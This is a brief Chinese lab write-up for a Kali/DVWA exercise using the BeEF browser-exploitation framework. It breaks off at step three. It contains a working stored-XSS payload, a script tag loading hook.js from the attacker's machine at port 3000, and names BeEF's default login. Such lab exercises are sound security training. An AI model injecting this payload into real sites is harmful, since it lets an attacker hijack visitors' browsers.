实验一:XSS攻击框架beef
实验环境:kali、DVWA
实验步骤:
1、打开kali的命令行,输入:beef-xs,获得一个js脚本,并跳出beef登录界面,输入用户名和密码(默认都是beef)
2、输入ifconfig查看ip,复制js代码,并将ip改为本机ip,此时js代码如下:
<script src="http://192.168.1.106:3000/hook.js"></script>
3.在低级DVWA中的储存式XSS模块中输入以下内容,可看到kali上面有了变化